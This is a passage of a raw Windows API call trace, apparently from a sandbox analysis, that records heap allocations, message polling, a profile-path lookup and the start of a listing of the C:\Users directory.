lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0179.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0179.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0179.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0179.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0179.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0179.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0179.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7720 | out: hHeap=0x2c0000) returned 1 [0179.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7720 [0179.774] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0179.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0179.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0179.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0179.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0179.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0179.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7720 | out: hHeap=0x2c0000) returned 1 [0179.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42580 [0179.784] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0179.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0179.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0179.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0179.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0179.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0179.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0179.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0179.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0179.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0179.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0179.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0179.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0179.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0179.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0179.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.792] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0179.792] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0179.792] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0179.792] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0179.792] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0179.792] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0179.792] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0179.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.792] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0179.792] PathFindFileNameW (pszPath="") returned="" [0179.792] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0179.793] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0179.793] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0179.793] FreeLibrary (hLibModule=0x759a0000) returned 1 [0179.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad79a0 | out: hHeap=0x2c0000) returned 1 [0179.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad79a0 [0179.793] FindFirstFileW (in: lpFileName="C:\\Users\\*" (normalized: "c:\\users\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0179.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad79a0 | out: hHeap=0x2c0000) returned 1 [0179.794] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.794] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0179.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42580 [0179.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0179.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0179.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42580 | out: hHeap=0x2c0000) returned 1 [0179.795] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x629b4b20, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x629b4b20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0179.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42580 [0179.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42628 [0179.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0179.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42580 | out: hHeap=0x2c0000) returned 1 [0179.796] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0179.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42580 [0179.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42660 [0179.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0179.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42580 | out: hHeap=0x2c0000) returned 1 [0179.797] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, 